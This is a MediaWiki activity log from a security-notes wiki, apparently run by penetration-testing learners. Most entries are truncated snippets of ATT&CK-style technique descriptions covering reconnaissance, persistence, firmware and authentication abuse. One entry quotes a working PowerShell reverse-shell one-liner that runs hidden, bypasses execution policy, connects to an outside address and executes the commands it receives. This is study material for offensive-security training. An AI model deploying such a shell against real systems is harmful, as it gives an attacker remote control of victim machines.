Combined display of all available logs of RCATs. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).
- 12:14, 28 January 2023 Ali3nw3rx deleted page Category:Compromise Accounts (content was: "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a...", and the only contributor was "Ali3nw3rx")
- 12:12, 28 January 2023 Ali3nw3rx deleted page Category:Victim Org Information (content was: "Attackers may collect information about the victim organization that can be used to identify potential targets. This information can include details about different divisions/departments, business operations, and key employees' roles and responsibilities. They may collect this information through various methods such as directly requesting it via phishing emails. The inf...", and the only contributor was "Ali3nw3rx")
- 12:12, 28 January 2023 Ali3nw3rx deleted page Category:Victim Network Information (content was: "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. Adversaries may gather this information in various ways, such as direct collection acti...", and the only contributor was "Ali3nw3rx")
- 12:11, 28 January 2023 Ali3nw3rx deleted page Category:Victim Identity Information (content was: "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via Phish...", and the only contributor was "Ali3nw3rx")
- 12:11, 28 January 2023 Ali3nw3rx deleted page Category:Victim Host Information (content was: "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). Adversaries may gather this information in various ways...", and the only contributor was "Ali3nw3rx")
- 12:11, 28 January 2023 Ali3nw3rx deleted page Category:Search Victim-Owned Websites (content was: "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: Email Addresses). These sites may also have details highlighting business operations and relationships.[1] Adversaries may search victim-owned websites to gather actionable informati...")
- 12:11, 28 January 2023 Ali3nw3rx deleted page Category:Search Open Websites/Domains (content was: "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, news sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.[1][2][3] Adversaries may search in diff...", and the only contributor was "Ali3nw3rx")
- 12:10, 28 January 2023 Ali3nw3rx deleted page Category:Search Open Technical Databases (content was: "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.[1][2][3][4][5][6][7] Adversa...", and the only contributor was "Ali3nw3rx")
- 12:10, 28 January 2023 Ali3nw3rx deleted page Category:Search Closed Sources (content was: "Adversaries may gather information about victims from private, closed sources that can be used to identify potential targets. This information may be available for purchase from reputable sources such as paid subscriptions to feeds of technical/threat intelligence data, or from less reputable sources such as dark web or cybercrime black markets. They may search different...", and the only contributor was "Ali3nw3rx")
- 12:00, 28 January 2023 Ali3nw3rx created page Ping (Created page with "Category:Active Scanning ==Description== Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Adversaries may scan IP blocks in order to Gather Victim Network Information, such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings...")
- 11:33, 28 January 2023 Ali3nw3rx created page User:Ali3nw3rx (Created page with "thumb")
- 11:31, 28 January 2023 Ali3nw3rx created page File:Gaming-logo-maker-featuring-robotic-animal-graphics-1028-el1 (3).png
- 11:31, 28 January 2023 Ali3nw3rx uploaded File:Gaming-logo-maker-featuring-robotic-animal-graphics-1028-el1 (3).png
- 11:15, 28 January 2023 Ali3nw3rx created page Powershell Reverse Shell (Created page with " ==Powershell Reverse Shells== <syntaxhighlight lang="powershell"> powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";...") Tag: Visual edit
- 18:47, 26 January 2023 Ali3nw3rx created page Template:Test page (Created page with "== This is our test page == == section 1 == === code we want to grab === == section 2 == === more code to grab === <syntaxhighlight> some random code </syntaxhighlight>")
- 18:39, 26 January 2023 SourMilk created page Category:PwnTillDawn (Created page with "=Description= PwnTillDawn<ref>https://online.pwntilldawn.com/</ref> Online Battlefield is a penetration testing lab created by wizlynx group where participants can test their offensive security skills in a safe and legal environment, but also having fun! The goal is simple, break into as many machines as possible using a succession of weaknesses and vulnerabilities and collect flags to prove the successful exploitation. Each target machine that can be compromised contain...") Tag: Visual edit
- 18:23, 26 January 2023 Ali3nw3rx created page Test cheat sheet (Created page with "enumeration")
- 18:00, 26 January 2023 Ali3nw3rx created page Terminal Services DLL (Created page with "Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.[1] Windows Services that are run as a "generic" process (ex: svchost.exe) load the service's DLL file, the location of wh...")
- 17:59, 26 January 2023 Ali3nw3rx created page IIS Components (Created page with "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extens...")
- 17:55, 26 January 2023 Ali3nw3rx created page Web Shell (Created page with "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.[1] In addition to a server-side script, a Web shell may have a client interface program that is used to...")
- 17:54, 26 January 2023 Ali3nw3rx created page Transport Agent (Created page with "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.[1][2] Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequ...")
- 17:54, 26 January 2023 Ali3nw3rx created page SQL Stored Procedures (Created page with "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted). Adversaries may craft malicious stored procedures that can provide a pers...")
- 17:53, 26 January 2023 Ali3nw3rx created page Category:Server Software Component (Created page with "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.[1] category: persistence")
- 17:50, 26 January 2023 Ali3nw3rx created page TFTP Boot (Created page with "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. Adversaries may manipulate the configuration on the network d...")
- 17:49, 26 January 2023 Ali3nw3rx created page ROMMONkit (Created page with "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. [1][2] ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to TFTP Boot, an adversary may upgrade the ROMMON image locally or remotely (for exampl...")
- 17:49, 26 January 2023 Ali3nw3rx created page Bootkit (Created page with "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). [1] The MBR is the section of disk that is first loaded after completing hardware initialization...")
- 17:48, 26 January 2023 Ali3nw3rx created page Component Firmware (Created page with "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking. Malicious component firmwar...")
- 17:48, 26 January 2023 Ali3nw3rx created page System Firmware (Created page with "Adversaries may modify system firmware to persist on systems. The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. [1] [2] [3] System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicio...")
- 17:47, 26 January 2023 Ali3nw3rx created page Category:Pre-OS Boot (Created page with "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems...")
- 17:47, 26 January 2023 Ali3nw3rx deleted page Pre-OS Boot (content was: "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (...", and the only contributor was "Ali3nw3rx")
- 17:47, 26 January 2023 Ali3nw3rx created page Pre-OS Boot (Created page with "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems...")
- 17:45, 26 January 2023 Ali3nw3rx created page Add-ins (Created page with "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. [1] There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. [2][3] Ad...")
- 17:44, 26 January 2023 Ali3nw3rx created page Outlook Rules (Created page with "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.[1] Once mal...")
- 17:44, 26 January 2023 Ali3nw3rx created page Outlook Home Page (Created page with "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.[1] Once malicious home pages have been added to the user's mailbox, th...")
- 17:43, 26 January 2023 Ali3nw3rx created page Outlook Forms (Created page with "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.[1] Once malicious forms have been added to the user's mailbox, they will be loaded when Outlook is started. Malicious forms will e...")
- 17:43, 26 January 2023 Ali3nw3rx created page Office Test (Created page with "Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office inst...")
- 17:42, 26 January 2023 Ali3nw3rx created page Office Template Macros (Created page with "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. [1] Office Visual Basic for Applications (VBA) macros [2] can be inserted into the base template and used to execute code when the respective Office application starts in order to...")
- 17:41, 26 January 2023 Ali3nw3rx created page Category:Office Application Startup (Created page with "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. A variety of features have been discovered in Outlook that can be abused to...")
- 17:40, 26 January 2023 Ali3nw3rx created page Hybrid Identity (Created page with "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchro...")
- 17:40, 26 January 2023 Ali3nw3rx created page Multi-Factor Authentication (Created page with "Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts. Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as Multi-Factor Authentication Request Generation, adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as exclu...")
- 17:39, 26 January 2023 Ali3nw3rx created page Reversible Encryption (Created page with "An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.[1] If the property is enabl...")
- 17:38, 26 January 2023 Ali3nw3rx created page Network Device Authentication (Created page with "Adversaries may use Patch System Image to hard code a password in the operating system, thus bypassing native authentication mechanisms for local accounts on network devices. Modify System Image may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the...")
- 17:37, 26 January 2023 Ali3nw3rx created page Pluggable Authentication Modules (Created page with "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.[1][2][3] Adversaries may modify components of the...")
- 17:36, 26 January 2023 Ali3nw3rx created page Password Filter DLL (Created page with "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers f...")
- 17:35, 26 January 2023 Ali3nw3rx created page Domain Controller Authentication (Created page with "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user's account and/or credentials (ex: Skeleton Key). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with...")
- 17:34, 26 January 2023 Ali3nw3rx created page Category:Modify Authentication Process (Created page with "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating creden...")
- 17:33, 26 January 2023 Ali3nw3rx created page Implant Internal Image (Created page with "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike Upload Malware, this technique focuses on adversaries implanting an image in a registry within a victim's environment. Depending on how t...")
- 17:33, 26 January 2023 Ali3nw3rx created page KernelCallbackTable (Created page with "Adversaries may abuse the KernelCallbackTable of a process to hijack its execution flow in order to run their own payloads.[1][2] The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.[3] An adversary may hijack the execution flow of a process using the KernelCallbackTable by replacing an original callback function with a malicious payload. Modi...")
- 17:32, 26 January 2023 Ali3nw3rx created page COR PROFILER (Created page with "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.[1][2] The COR_PROFILER environm...")
- 17:31, 26 January 2023 Ali3nw3rx created page Services Registry Permissions Weakness (Created page with "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a ser...")